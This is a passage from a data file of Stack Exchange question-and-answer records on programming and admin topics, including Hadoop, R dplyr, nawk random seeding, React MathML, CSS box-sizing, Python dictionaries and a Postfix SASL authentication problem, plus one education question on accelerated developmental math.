MapReduce in Hadoop, and want to convert a String to an IntWritable for it. I'm following the advice listed here: How to convert String object to IntWritable Object in Hadoop.\nIt advises to use \n<code>new IntWriteable(Integer.parseInt(someString))\n<\/code>\nso what I am trying is \n<code>public class MyMapper extends Mapper<LongWritable, Text, Text, IntWritable > {\nprivate final Text wordKey = new Text(\"\");\n\npublic void map(LongWritable ikey, Text value, Context context) throws IOException, InterruptedException {\n String[] friend = value.toString().split(\";\");\n String[] friendswith = friend[1].split(\",\");\n for (String s : friendswith) {\n wordKey.set(friend[0]);\n context.write(wordKey, IntWritable(Integer.parseInt(s))); \/\/trying to convert here\n }\n }\n}\n<\/code>\nbut get the error \n<code>The method IntWritable(int) is undefined for the type MyMapper\n<\/code>\nAccording to the documentation here it notes, that there is a contructor that accepts an <code>int<\/code> as an input. I do have <code>IntWritable<\/code> imported:\n<code>import org.apache.hadoop.io.IntWritable;\n<\/code>\nWhat might cause that I cannot use the <code>IntWritable(int)<\/code> constructor?\nComment: You are missing `new` keyword between `context.write(wordKey` and `IntWritable(Integer.parseInt(s)))`\nAnswer: Yout are missing the <code>new<\/code> keyword.\nIn the line\n<code>context.write(wordKey, IntWritable(Integer.parseInt(s)));\n<\/code>\nyou are not creating an instance of <code>IntWritable<\/code>, instead you are trying to call a method named <code>IntWritable<\/code> which is not defined.\nTry this:\n<code>context.write(wordKey, new IntWritable(Integer.parseInt(s)));\n<\/code>\nComment: Oh. Right. Thank you! 
:)\n","meta":{"source":"stackoverflow","title":"Hadoop - IntWritable(int) constructor not loaded","dup_signals":{}},"subset":"stackexchange"} +{"text":"Create ID for specific sequence of consecutive days based on grouping variable in R\n\nQuestion: For a list of events at the country-day level, we would like to create a unique ID for a sequence of consecutive days in a specific country (if two or more days of events in a country are consecutive --> create unique ID), so that I can ultimately reduce the data frame to specific sequences of events rather than event days. \nI did not manage to aggregate the data based on the sequence of events. I believe this response is similar (Creating groups of consecutive days meeting a given criteria) however it is in SQL.\nThe data has the following format:\n<code>country <- c(\"Angola\",\"Angola\",\"Angola\",\"Angola\",\"Angola\", \"Benin\",\"Benin\",\"Benin\",\"Benin\",\"Benin\",\"Benin\")\nevent_date <- as.Date(c(\"2017-06-16\", \"2017-06-17\", \"2017-06-18\", \"2017-08-22\", \"2017-08-23\", \"2019-04-18\", \"2019-04-19\", \"2019-04-20\", \"2018-03-15\", \"2018-03-16\", \"2016-03-17\"))\n\nmydata <- data.frame(country, event_date)\n<\/code>\nIn the output, I expect to have a new column with the ID that is unique to each series of events in a country:\n<code>seq.ID <- c(1,1,1,2,2,3,3,3,4,4,4)<\/code>\n<code>mydata2 <- data.frame(country, event_date, seq.ID)<\/code>\nSo that ultimately, I can reduce the data to the level of country and sequence of events:\n<code>mydata3 <- mydata2[!duplicated(mydata2$seq.ID),]<\/code>\nAnswer: Try:\n<code>library(dplyr)\n\nmydata %>%\n group_by(country) %>%\n distinct(seq.ID = cumsum(event_date != lag(event_date, default = first(event_date)) + 1L)\n<\/code>\nOutput:\n<code># A tibble: 5 x 2\n# Groups: country [2]\n seq.ID country\n <int> <fct> \n1 1 Angola \n2 2 Angola \n3 1 Benin \n4 2 Benin \n5 3 Benin \n<\/code>\nYou can also use the <code>.keep_all<\/code> argument in <code>distinct<\/code> and preserve the first date of each sequence:\n<code>mydata %>%\n group_by(country) %>%\n distinct(seq.ID = cumsum(event_date != lag(event_date, default = first(event_date)) + 1L),\n .keep_all = TRUE)\n\n# A tibble: 5 x 3\n# Groups: country [2]\n country event_date seq.ID\n <fct> <date> <int>\n1 Angola 2017-06-16 1\n2 Angola 2017-08-22 2\n3 Benin 2019-04-18 1\n4 Benin 2018-03-15 2\n5 Benin 2016-03-17 3\n<\/code>\nIn case of desired non-aggregated output with different sequence IDs, you could do:\n<code>mydata %>%\n mutate(\n seq.ID = cumsum(\n (event_date != lag(event_date, default = first(event_date)) + 1L) |\n country != lag(country, default = first(country))\n )\n )\n\n country event_date seq.ID\n1 Angola 2017-06-16 1\n2 Angola 2017-06-17 1\n3 Angola 2017-06-18 1\n4 Angola 2017-08-22 2\n5 Angola 2017-08-23 2\n6 Benin 2019-04-18 3\n7 Benin 2019-04-19 3\n8 Benin 2019-04-20 3\n9 Benin 2018-03-15 4\n10 Benin 2018-03-16 4\n11 Benin 2016-03-17 5\n<\/code>\nNote that there is a typo in your last <code>event_date<\/code>, this is why the outputs don't correspond 100% to your desired output.\nComment: Thanks much for this solution. While it works well for the sample I provided, it doesn't work on the full dataset with the exact same data structure. 
I still try to figure out what the problem is and let you know once I find a solution.\nComment: Just figured out that I had to add arrange(country, event_date) to make it work properly with the full dataset.\nComment: Thank you very much....I just realized that I missed to provide a crucial line in the code (what the seq ID should look like) - and just edited it. The tricky bit is that I would like every unique country-sequence to have their own ID (i.e. they shouldn't be repetitive across countries). So that ultimately I can select all unique country-sequences easily by deleting duplicates.\nComment: See my edit - note that there is a typo in your last `event_date` so the last line doesn't correspond to your desired output.\n","meta":{"source":"stackoverflow","title":"Create ID for specific sequence of consecutive days based on grouping variable in R","dup_signals":{}},"subset":"stackexchange"} +{"text":"What is accelerated developmental math education, and is it a good idea?\n\nQuestion: I teach physics and math at a community college in California. I got in a politically tinged discussion with a colleague today in which I claimed that one of socialism's weaknesses was its historical unwillingness to throw failed programs in the trash, and I challenged him to name a single positive educational reform that had occurred within our lifetimes in American community colleges and had spread and taken root. Annoyingly, he was able to come up with an example, which was accelerated developmental math education.\nI hadn't known until today that such a thing existed, and it doesn't yet exist at my school. I'm still hazy on what it is.\nWhat exactly is accelerated developmental math education? How does it work, and is it a good idea?\nComment: \"unwillingness to throw failed programs in the trash\" - reminds me of the sunk-cost fallacy: http:\/\/enciklopedia-vortaro-de-la-merk-angla.weebly.com\/temo-sunk-cost-fallacy.html\nAnswer: Accelerated developmental education includes a variety of mechanisms to shorten time students spend in remediation. It can include: Batching together multiple courses of remediation in one semester (say: 6 or 9 credits in one semester), likely with \"supports\" such as tutors and learning communities; batching together remediation in simultaneous credit-bearing courses (e.g., a 6 credit combined remedial algebra and statistics course); giving short workshops of a few days and then re-taking placement tests in basic skills; or possibly simply eliminating remedial courses altogether. \nThe motivation is based on the observation that students assigned to remediation are likely to fail and drop out of school -- and an interpretation that anything that minimizes or eliminates remediation is a good thing (i.e., keeps students in school, keeps them attending other courses, increases total credits and chance of graduation). One point that proponents of acceleration like to make is that some percentage of students who pass a remedial course still drop out before the next math course in the sequence (I've seen 20% thrown around as an estimate; \"life happens\" is a common attribution). \nThinkers at the Community College Research Center, Teachers College, Columbia University have been at the forefront of this movement. Consider Jaggers, et. al., \"Designing Meaningful Developmental Reform\" (CCRC, 2013). They identify three \"tensions\" in developmental education reform: (1) institutional autonomy vs. system-wide consistency, (2) efficient vs. 
effective assessment, and (3) supporting student progress vs. maintaining academic standards. On this latter point, they write: \n\nColleges often feel ambivalent about implementing changes that might\n improve student progression but could possibly undermine academic\n quality. Mounting evidence suggests, however, that accelerated\n developmental models\u2014such as shortening developmental sequences and\n mainstreaming upper level developmental students into college-level\n courses with mandatory supports\u2014lead to improved outcomes for these\n students.\n\nThey cite several findings that accelerated remediation leads to increased percentages of students who pass credit-bearing English and Math courses, for example:\n\nCritics would include Scherer and Anson in \"Community Colleges and the Access Effect\" (Palgrave Macmillan, 2014). In chapter 1 they make the point that thinking on remediation has made something of a full circle: in the 60's-70's larger number of students were entering unprepared and failing college-level math courses (under a \"'Right to fail' philosophy\"); the 80's-90's saw the blossoming of remedial education to address these student's needs; and the 00's-10's are seeing a backlash against remediation. In chapter 3 they write of developmental education:\n\nEnemy. Gated. Broken. Brick wall. Dysfunctional. Disaster. Bridge to\n nowhere. Burial ground. Senior research analyst for the U.S.\n Department of Education Clifford Adelman ultimately tied the divisive\n rhetoric to blind allegiance to the completion agenda and explained\n that, \"As a consequence, what often pours out are scare stories that\n make for good press and bad policy. The bad data-driven scare story,\n in fact, has become the preferred narrative.\" Developmental education\n has been especially painted with the broad brush of failure by\n completion guardians who believe that maintaining open admissions at\n our nation's community colleges and freeing low-skilled students from\n assignment to developmental education constitutes sensible completion\n strategy. Implicit in the arguments of developmental education critics\n are many false assumptions, chief among them that most students\n currently enrolled in developmental education would be much better\n served by enrolling in college-level coursework with embedded support.\nThat assumption, prompted by the realization that life events have a\n greater chance of derailing completion the longer a student remains in\n college, has led some completion advocates to herald the \"strategy\" of\n racing low-skilled students through higher education as an acceptable\n way to increase American postsecondary credential award...\nUsing the example of someone pursuing \"a two-year nursing\n certificate,\" Bill Gates declared, \"We owe it to every American to\n make it pretty darn easy for them to get through that system.\"\n\n(I will point out that the Gates Foundation is one of the primary sponsors of education reform today; note that they funded the CCRC report quoted above.) \nAs one example, the CCRC report provides a pretty good road map for changes to remediation that have occurred at CUNY in the past few years. Institutional autonomy on the issue has been largely sidestepped in favor of central system planning. Students universally taking placement tests for basic arithmetic skills was eliminated a few years back. Most recently, the requirement that all students pass basic writing and algebra tests before graduating has been removed. 
A new central requirement is that non-STEM majors be provided with a credit-bearing math course sans algebra prerequisite. The expectation is that graduation rates will rise as a result. \nAnswer: My sense is that it is a good idea. I will come back later to write a more complete answer, but much of what I will say can be found at the website of the California Acceleration Project.\n","meta":{"source":"matheducators.stackexchange","title":"What is accelerated developmental math education, and is it a good idea?","dup_signals":{}},"subset":"stackexchange"} +{"text":"rand() in for loop in nawk returns always same value -ksh\n\nQuestion: i am troubling myself too much time now with this rand().\nI want to add <code>1000<\/code> random numbers in an array, this is what i have so far, it works ith no error, but rand assigns all the time the same number in the arrays passing. the vary of the random numbers i want it to be from 1 to 999... any ideas whats going wrong? \nbtw i am running in ksh...\n<code>nawk ' BEGIN{ \n for (i=0; i<=999; i++) {\n srand()\n NUMBERS[i]= int(rand()*(999))\n print NUMBERS[i]\n }\n}'\n<\/code>\nP.S.\nNot a dublicate, no other same question for ksh.\nUPDATED\n<code>nawk ' BEGIN{ \n srand(1)\n for (i=0; i<=999; i++) {\n NUMBERS[i]= int(rand()*(999))\n XNUMBERS[i]= int(rand()*(999))\n print NUMBERS[i]\n print XNUMBERS[i]\n }\n}'\n<\/code>\nUPDATE_2\nSo the working code i have is this \n<code>NUMBERS=`nawk ' BEGIN{ \n srand()\n for (i=0; i<=999; i++) {\n printf(\"%s\\n\", 100 + int(rand() * (899)));\n } \n}'`\nNUMBERS\n#echo $NUMBERS\nXNUMBERS=`nawk ' BEGIN{ \n srand()\n for (i=0; i<=999; i++) {\n XNUMBERS[i]= 100 + int(rand() * (899));\n }\n for (i=0; i<=999; i++) {\n ver=XNUMBERS[i] \"\";\n rev = \"\";\n for (q=length(ver); q!=0; q--) {\n rev = rev substr(ver, q, 1);\n }\n printf(\"%s\\n\", XNUMBERS[i] \"|\" rev );\n }\n}'`\n<\/code>\ni am creating two different lists, but the rand() is giving in both the same exact numbers in the same position.... how can i make the second rand give different numbers?????\nFinal Update\nSooooo, to any people reading and have the same problem, the solution is to ue a sleep 1 between the two parts that you call the srand....\nAnswer: Put the <code>srand()<\/code> call outside the loop. For the same seed value <code>rand()<\/code> would produce the same sequence of numbers. <code>srand()<\/code> without any argument uses the current timestamp as seed and the loop probably happens to use the same seed value. Hence, you see the same number.\nComment: Right, the timestamp resolution is in seconds so your loop will produce the same value on each iteration as long as all the iterations happen within the same 1-second window. If the current time happened to cross from 12:00:01 to 12:00:02 or similar while your loop was running then you'd get 2 values. @hedgehog - Moving srand() outside of the loop is the right thing to do but by using a hard-coded seed value of 1 you're negating the whole point of using srand() which is to get a new seed value for rand() on every call to the script (as long as the calls are 1 second or more apart).\nComment: It's not \"wrong\" per se (to use the same fixed seed). But for *same* seed value, rand() will produce exactly the same sequence of numbers. i.e. with `srand(1)`, you'll *always* get the *same* set of numbers all the time (now, tomorrow, next year etc). Typically, that's why *time* is used as seed which is reasonably good seed for most applications.\nComment: Yes, you are wrong. 
It's a **seed** value for rand() so it's somethign rand() uses as a \"previous value\" when generating it's next random number. It's functionally no different than if you didn't call srand() at all in as much as rand() will produce the same \"random\" number the first time it's called on each invocation of your awk script. rand() always outputs a value that's `>= 0` and `< 1` so to produce random integers between 1 and 999 is `srand(); print int(1 + rand()*999)`.\nComment: There's no need to introduce a delay, just seed them with $RANDOM or similar instead of the current epoch time, e.g. `awk -v seed=\"$RANDOM\" 'BEGIN{srand(seed) ...`. This: `int(rand()*(999))` will give you numbers from 0 to 998, btw, not from 1 to 999 as you say you want. Please re-read my comments above for how to do what you say you want.\nComment: screw me.. that was the fault? cant believe it... check please the updated post with the code, i put the srand out of the loop, is it wrong if i add the value 1? i use it for saying, that 1 is the starting value.\nComment: i see, but i thought i read that the value that you add to srand, so in this case i tried 1, is the starting value of the random numbers, so as i see it its like i am saying pick a random number from 1 to 999... am i wrong?\nComment: i see your points guys, i sorted it out now, thank you a lot... plus @EdMorton you must really like my posts, i have an answer of yours on every single one :p\nComment: You don't have an answer of mine on this one or your [last one](http:\/\/stackoverflow.com\/q\/36745088\/1745001) so I think that might be a slight exaggeration. Not that I don't like your posts, of course :-).\nComment: @EdMorton well, you did comment though :p so that counts hihihihi\nComment: @EdMorton anyways, i got a problem with using this the rand( because i am using it in the same script to make two random lists, and it is giving the same exact numbers in both lists, i need it to give different numbers, SEE UPDATE^^)\nComment: @hedgehog The issue is same as before: srand() most likely gets run with the *same seed* value twice. Just remove the second srand() call from the script.\nComment: i found the sollution..... its because both srand were being run in the same second, so they had same value from time of the pc, i just added a sleep 1 between the two nawk and its working fine :)\n","meta":{"source":"stackoverflow","title":"rand() in for loop in nawk returns always same value -ksh","dup_signals":{}},"subset":"stackexchange"} +{"text":"React 16 HTML attributes with MathML tags\n\nQuestion: I'm using MathML markup language to render math equations on my web app. Here's an example of an simple equation which is problematic:\n<code><math xmlns=\"http:\/\/www.w3.org\/1998\/Math\/MathML\"><mfenced open=\"[\" close=\"]\"><mn>8<\/mn><\/mfenced><\/math>\n<\/code>\nThe problem is that React will not treat the attributes of the mfenced tag like we would want to. It treats the \"open\" attribute as if it was used in a HTML context, so it will not accept its \"[\" value. React will output the mfenced tag like this:\n<code><mfenced open close=\"]\"><mn>8<\/mn><\/mfenced>\n<\/code>\nOf course, this breaks the equation in the browser. 
Is there a way to tell React not to change this attribute?\nComment: what you need is something like an `xml-loader` or xml parser at the babel level so that while compiling it can parse those syntaxes (just a thought)\nAnswer: The MathJax React component is what you were looking for.\nImport the package and fill the math property with some text containing your formals. Wrap TeX in $ or $$ and ASCIImath in `. Paste MathML as is.\nHere's an example:\n<code>import React, {Component} from 'react'\nimport {render} from 'react-dom'\nimport MathJax from 'react-mathjax-preview'\n\nconst asciimath = '`sum_(i=1)^n i^3=((n(n+1))\/2)^2`' # Because of the backtick\nconst math = String.raw`\n <math xmlns=\"http:\/\/www.w3.org\/1998\/Math\/MathML\" display=\"block\">\n <menclose notation=\"circle box\">\n <mi> x <\/mi><mo> + <\/mo><mi> y <\/mi>\n <\/menclose>\n <\/math>\n\n $$\\lim_{x \\to \\infty} \\exp(-x) = 0$$\n\n ${asciimath}`\n\nclass Demo extends Component {\n constructor(props) {\n super(props);\n this.state = {\n math: tex\n }\n render() {\n return <MathJax math={this.state.math} \/>\n }\n}\n<\/code>\nThey also have a more advanced demo inside the repository.\nPS: I saw one issue related to MathML in their repo. A workaround is described there.\nComment: Equations in my app are integrated into paragraphs (html p tags), and this package renders the equations into div tags. Div tags are not allowed as children of p tags though... So I finally used a parser ([html-react-parser](https:\/\/github.com\/remarkablemark\/html-react-parser)) that detects and replace my math tags with span tags which use the react property \"dangerouslySetInnerHTML\" with the MathML equation as the property value. To convert my MathML equations to string, I used [react-element-to-string](https:\/\/github.com\/glenjamin\/react-element-to-string)\nComment: As I tried to explain, unfortunately, the MathJax React package you suggested to use did not solve my problem. 
I will post a more detailed answer with my solution soon.\n","meta":{"source":"stackoverflow","title":"React 16 HTML attributes with MathML tags","dup_signals":{}},"subset":"stackexchange"} +{"text":"How do I replace the \"From\" address from my mailings?\n\nQuestion: I setup a default adress in CiviMail -> From Email Adresses , like this : \n<code>\"Example\" <email@example.com><\/code>\nbut the problem is that when I send mails, the \"From adress\" change and become :\n<code>\"Example\" <firstname.lastname@example.com><\/code>\n(I specify that I use a gmail account in the SMTP sending settings)\nIs it possible to force that mailing adress so it become \"email@example.com\" ?\nAt the begining, I was using a private adress (in my own domain) for civiCRM SMTP's settings (and it worked fine), but lately we need to migrate these mails to Office365 \/ Exchange mails and I have never been able to get CiviCRM mailings to work with the new Office365\/Outlook\/Exchange settings, that's why I opted for an SMTP account that uses gmail.\nComment: have you checked both \/civicrm\/admin\/domain?action=update&reset=1 and \/civicrm\/admin\/options\/from_email_address?reset=1\nComment: I try the first link ( `\/wp-admin\/admin.php?page=CiviCRM&q=civicrm%2Fadmin%2Fdomain%3Faction%3Dupdate&reset=1` in my wordpress ) and I land on the admin page with no particular message.\nI try the second with `\/wp-admin\/admin.php?page=CiviCRM&q=civicrm\/admin\/options\/from_email_address?reset=1` but I got an error\n\nand it seems like I got the same problem with the \"from\" email changing.\nComment: @petednz-fuzion The error in log file : https:\/\/pastebin.com\/raw\/b4SyVE1u\nComment: also, I replaced the \"?\" with a \"&\" in the second link and it seems to works, I land on the \"From Email Adresses\" page , but the email@example.com email continues to appear in the From field of my mailings.\nComment: What version of Civi are you running? Just a note that in 4.7.30 they removed the duplicate 'From email address' setting in the organizational contact that petednz is referring to in the first link.\nComment: @RayWright I use version 5.5.1\nComment: Pretty sure that's an effect of sending via Gmail - it's an anti-spoofing thing if you try to send with a non-gmail account.\nAnswer: So I am assuming that the only thing that changed between \"it worked\" and \"it doesn't\" is to switch from your own smtp to your gmail one.\nBeside the problem you mention, using smtp from gmail will not work to send mass emails, they have a lot of limits and as soon as your list has more than a handful of emails, you will have problems.\nThere as several providers (sendgrid, mailjet...) that are integrated with civi, and I'd recommend you switching to one of them\nAnd it should solve out your gmail.com problem too\n","meta":{"source":"civicrm.stackexchange","title":"How do I replace the \"From\" address from my mailings?","dup_signals":{}},"subset":"stackexchange"} +{"text":"C# Client-Server Video streaming\n\nQuestion: Are there any c# libraries to facilitate the streaming of video in a client-server architecture? I would also be interested in finding some resources to learn more on the subject of video streaming on the .NET platform, and streaming in general.\nThanks!\nComment: I suppose you could use WCF. Streaming from IIS, it looks like you just install [this](http:\/\/learn.iis.net\/page.aspx\/620\/getting-started-with-iis-live-smooth-streaming\/). 
Streaming video with WCF would look something like [this](http:\/\/blogs.msdn.com\/b\/gblock\/archive\/2010\/11\/24\/streaming-over-http-with-wcf.aspx). What do you hope to gain from using WCF?\nComment: Do you want to consume or produce the stream?\nComment: ultimately I would be writing both the client and server side of the system\nComment: Do you need to do it yourself, or can you rely on IIS to stream it for you?\nComment: I suppose iis would be an option. Would wcf services be useful at all in a situation like this? I have very minimal video experience\nComment: Wcf was just the first thing tthat came to mind really . Thank you, I will check out the links\nAnswer: In my previous attempts at this very problem I have always come to the conclusion (from other people's recommendations) that this book is the keystone piece to that problem - http:\/\/www.amazon.com\/Programming-Microsoft-DirectShow-Television-Pro-Developer\/dp\/0735618216\nI had read before that it was out of print and only used copies were available at around $150 - but it looks like there are now new prints available which has dropped the price down to around $90 - but you still have to contend with it being a technology that Microsoft has deemed depracated (but they haven't replaced it with anything new yet) and of course if you look at the reviews on the book it certainly doesn't seem worth even $40 which would be my cap on something written almost a decade ago. \nThat being said - it has been about two years since I was attempting such a project so this information may be as deprecated as directx itself! ;)\n","meta":{"source":"stackoverflow","title":"C# Client-Server Video streaming","dup_signals":{}},"subset":"stackexchange"} +{"text":"Python Dictionary of dictionaries\n\nQuestion: I'm using python3.\nI have a dictionary\n<code>simulations = {\n 'wk01' : '183',\n 'wk02' : '170',\n 'wk03' : '184',\n}\n<\/code>\nand a separate dictionary containing a descriptive string\n<code>condition_old = {'slow'}\n<\/code>\nI am later joining simulations and condition_old to get a complete string.\n<code>simulations = {simulation : '-'.join([simulations[simulation],condition_old]) for simulation in simulations}\n\n<\/code>\nThis results in output =\n<code>{'wk01': '183-slow', 'wk02': '170-slow', 'wk03': '180-slow'}<\/code>\nI am then plotting data for each condition (e.g. slow).\nWhat I want to be able to do is to increase the number of values in the conditions e.g.:\n<code>condition_new = {'slow','med','fast}\n<\/code>\nand return a dictionary for each:\ncondition01 = <code>{'wk01': '183-slow', 'wk02': '170-slow', 'wk03': '180-slow'}<\/code>\ncondition02 = <code>{'wk01': '183-med', 'wk02': '170-med', 'wk03': '180-med'}<\/code>\ncondition03 = <code>{'wk01': '183-fast', 'wk02': '170-fast', 'wk03': '180-fast'}<\/code>\nWhat also needs to be considered is that the number of values in condition_new can vary, so I can't explicitly state 3 dictionary names to populate.\nMaybe a dictionary within a dictionary would be sufficient.\nIn the end I want to create 3 separate plots based on condition01 condition02 condition03.\nThanks\nComment: Have you tried creating a dictionary of dictionaries yet? Also, why not a list of dictionaries? 
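A minimal sketch of that list-of-dictionaries shape (variable names are hypothetical; the sample data is reused from the question):\n<code>conditions = ['slow', 'med', 'fast']\nsimulations = {'wk01': '183', 'wk02': '170', 'wk03': '184'}\n\n# One dict per condition, collected in a list instead of being nested in a dict.\nas_list = [\n    {week: f'{value}-{cond}' for week, value in simulations.items()}\n    for cond in conditions\n]\n# as_list[0] -> {'wk01': '183-slow', 'wk02': '170-slow', 'wk03': '184-slow'}\n<\/code>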
By the way, `condition_old` is a set, not a dict.\nComment: I am unsure how, i tried to do a few things but because they don't have the same keys it wasn't working.is it better i change condition_old and condition_new to lists?\nComment: cases is undefined in your expression for simulations.\nComment: @DarrylG thanks - i copied from another test. updated now.\nAnswer: You could use a loop and a dictionary comprehension. Something like:\n<code>simulations = {\n 'wk01' : '183',\n 'wk02' : '170',\n 'wk03' : '184',\n}\n\nconditions = {'slow', 'med', 'fast'}\n\nthedicts = dict()\nfor cond in conditions:\n thedicts[cond] = {k: f'{d}-{cond}' for k, d in simulations.items()}\n<\/code>\nComment: this looks good - how can i store all three as opposed to printing them though?\nComment: @okpython I edited the answer to put the three resulting dicts into another dict.\nComment: what if i wanted to get 3 separate dictionaries, as opposed to nesting them?\nComment: Not necessarily \na good idea. See e.g. http:\/\/stupidpythonideas.blogspot.com\/2013\/05\/why-you-dont-want-to-dynamically-create.html?m=1\n","meta":{"source":"stackoverflow","title":"Python Dictionary of dictionaries","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can't connect 2nd swipe gesture in interface builder\n\nQuestion: I'm trying to add two gestures to a UIView in interface builder (swipe left and swipe right).\nThe first one (swipe left) works ... but the 2nd swipe gesture (swipe right) doesn't work, and I think it's because I can't connect the \"New Referencing Outlet Connection\" to the view (like my 1st gesture has) [see attached image].\n\nIs this the reason?\nI achieve this programatically, but would really like to understand how to add multiple gestures in interface builder.\nComment: Wait, that's what the Referencing Outlet Collection Connection does??? +1\nAnswer: Look at the connections menu. They both automatically get added to the gestureRecognizers collection.\nAnswer: I made a short tutorial video on how to use multiple gestures (right and left) in the interface builder. No coding is needed. I think a video is a better explanation for you :)\nMy english is not the best, but I hope it helps you! :)\nXcode connect multiple gestures\n","meta":{"source":"stackoverflow","title":"Can't connect 2nd swipe gesture in interface builder","dup_signals":{}},"subset":"stackexchange"} +{"text":"Do not fill the space more div\n\nQuestion: i have this code\n<code><div id=\"menu_right_levels\">\n <div class=\"level\"> Livello 1 <\/div>\n <div class=\"level\"> Livello 2 <\/div>\n <div class=\"level\"> Livello 3 <\/div>\n <div class=\"level\"> Livello 4 <\/div>\n <div class=\"level\"> Livello 5 <\/div>\n <div class=\"level\"> Livello 6 <\/div>\n <div class=\"level\"> Livello 7 <\/div>\n <div class=\"level\"> Livello 8 <\/div>\n <div class=\"level\"> Livello 9 <\/div>\n <div class=\"level\"> Livello 10 <\/div>\n<\/div>\n<\/code>\nAnd this Style\n<code> .level {\n width: 100%;\n height: 10%;\n border: 1px solid black;\n }\n<\/code>\nI need a responsive div who auto fill him and have the same height, i don't know what, but my 10 divs, with height:10% appear so:\nAnswer: It's because of the border: Every div is in fact 10% + 2px tall. What you need is the CSS <code>box-sizing<\/code> property. 
With <code>box-sizing: border-box;<\/code> the CSS <code>height<\/code> property is also applied to the padding and border.\nJSFiddle: https:\/\/jsfiddle.net\/q39vvzfv\/\n\n<code>var boxSizing = \"border-box\";\nvar els = document.getElementsByClassName(\"level\");\nfunction toggleBoxSizing(e) {\n if (boxSizing == \"border-box\") {\n boxSizing = \"content-box\";\n e.target.innerHTML = \"Enable box-sizing\";\n } else {\n boxSizing = \"border-box\";\n e.target.innerHTML = \"Disable box-sizing\";\n }\n for (var i = 0; i < els.length; i++) {\n els[i].style.boxSizing = boxSizing;\n }\n}<\/code>\n<code>body {\n margin: 0;\n padding: 0;\n}\n#orange {\n background-color: #FF4500;\n height: 940px;\n}\n#menu_right_levels {\n float: right;\n height: 940px;\n width: 380px;\n background-color: #1E90FF;\n}\n.level {\n width: 100%;\n height: 10%;\n border: 1px solid black;\n text-align: center;\n box-sizing: border-box;\n }<\/code>\n<code><div id=\"menu_right_levels\">\n <div class=\"level\"> Livello 1 <\/div>\n <div class=\"level\"> Livello 2 <\/div>\n <div class=\"level\"> Livello 3 <\/div>\n <div class=\"level\"> Livello 4 <\/div>\n <div class=\"level\"> Livello 5 <\/div>\n <div class=\"level\"> Livello 6 <\/div>\n <div class=\"level\"> Livello 7 <\/div>\n <div class=\"level\"> Livello 8 <\/div>\n <div class=\"level\"> Livello 9 <\/div>\n <div class=\"level\"> Livello 10 <\/div>\n<\/div>\n<div id=\"orange\">\n <button onclick=\"toggleBoxSizing(event)\">Disable box-sizing<\/button>\n<\/div><\/code>\nAnswer: It's because of your borders. Every div is essentially 10% + 2px tall. The 2px adds up (adds up to 20px to be exact).\nA simple solution would be to add padding to the red div to make up for the extra 20 pixels:\n\n<code>#container {\n height: 600px\n}\n#left {\n background: red;\n float: left;\n height: 100%;\n width: 100px;\n padding-bottom: 20px; \/* BOTTOM PADDING ADDED *\/\n}\n#menu_right_levels {\n float: left;\n width: 300px;\n height: 100%\n}\n.level {\n width: 100%;\n height: 10%;\n border: 1px solid black;\n}<\/code>\n<code><div id=\"container\">\n <div id=\"left\"><\/div>\n\n <div id=\"menu_right_levels\">\n <div class=\"level\">Livello 1<\/div>\n <div class=\"level\">Livello 2<\/div>\n <div class=\"level\">Livello 3<\/div>\n <div class=\"level\">Livello 4<\/div>\n <div class=\"level\">Livello 5<\/div>\n <div class=\"level\">Livello 6<\/div>\n <div class=\"level\">Livello 7<\/div>\n <div class=\"level\">Livello 8<\/div>\n <div class=\"level\">Livello 9<\/div>\n <div class=\"level\">Livello 10<\/div>\n <\/div>\n<\/div><\/code>\nComment: box-sizing should be used here, so no need to mind about border-size, or eventual padding ...\n","meta":{"source":"stackoverflow","title":"Do not fill the space more div","dup_signals":{}},"subset":"stackexchange"} +{"text":"Postfix authentication failure, can't send email out\n\nQuestion: I was trying to set up my postfix email server and got the following errors when using the command \"auth login\" in the telnet session with my postfix service:\n<code>535 5.7.8 Error: authentication failed: generic failure<\/code>\n<code>warning: SASL authentication failure: cannot connect to saslauthd server: No such file or directory<\/code>\nI've followed the link below to set up the service.\nHow To Install and Configure Postfix on Ubuntu 16.04\nI've created 2 users, \"postmaster\" and \"yida\" in my computer. 
\"postmaster\" could not receive any email using the s-nail mail but could send to \"yida\", while \"yida\" could send and receive email but only to and from local user, like \"postmaster\".\nThe mail log has the following problem:\n<code>postfix\/smtp[3386]: connect to gmail-smtp-in.l.google.com[2607:f8b0:4001:c11::1a]:25: Network is unreachable\n<\/code>\nThis happens when I tried to send email to my own gmail account.\nThe interesting thing was that I gave up in the authentication and continued to type \"mail from\" command in my testing telnet session and the server gave me an \"OK\" response. Looks like Postfix was not requiring authentication.\nPlease see below the related files:\n\/etc\/postfix\/master.cf\n<code># Postfix master process configuration file. For details on the format\n# of the file, see the master(5) manual page (command: \"man 5 master\" or\n# on-line: http:\/\/www.postfix.org\/master.5.html).\n#\n# Do not forget to execute \"postfix reload\" after editing this file.\n#\n# ==========================================================================\n# service type private unpriv chroot wakeup maxproc command + args\n# (yes) (yes) (no) (never) (100)\n# ==========================================================================\nsmtp inet n - y - - smtpd\n#smtp inet n - y - 1 postscreen\n#smtpd pass - - y - - smtpd\n#dnsblog unix - - y - 0 dnsblog\n#tlsproxy unix - - y - 0 tlsproxy\n#submission inet n - y - - smtpd\n -o syslog_name=postfix\/submission\n# -o smtpd_tls_security_level=encrypt\n -o smtpd_sasl_auth_enable=yes\n# -o smtpd_reject_unlisted_recipient=no\n# -o smtpd_client_restrictions=permit_sasl_authenticated,reject\n# -o smtpd_helo_restrictions=$mua_helo_restrictions\n# -o smtpd_sender_restrictions=$mua_sender_restrictions\n# -o smtpd_recipient_restrictions=\n# -o smtpd_relay_restrictions=permit_sasl_authenticated,reject\n# -o milter_macro_daemon_name=ORIGINATING\n#smtps inet n - y - - smtpd\n -o syslog_name=postfix\/smtps\n# -o smtpd_tls_wrappermode=yes\n -o smtpd_sasl_auth_enable=yes\n# -o smtpd_reject_unlisted_recipient=no\n# -o smtpd_client_restrictions=permit_sasl_authenticated,reject\n# -o smtpd_helo_restrictions=$mua_helo_restrictions\n# -o smtpd_sender_restrictions=$mua_sender_restrictions\n# -o smtpd_recipient_restrictions=\n# -o smtpd_relay_restrictions=permit_sasl_authenticated,reject\n# -o milter_macro_daemon_name=ORIGINATING\n#628 inet n - y - - qmqpd\npickup unix n - y 60 1 pickup\ncleanup unix n - y - 0 cleanup\nqmgr unix n - n 300 1 qmgr\n#qmgr unix n - n 300 1 oqmgr\ntlsmgr unix - - y 1000? 1 tlsmgr\nrewrite unix - - y - - trivial-rewrite\nbounce unix - - y - 0 bounce\ndefer unix - - y - 0 bounce\ntrace unix - - y - 0 bounce\nverify unix - - y - 1 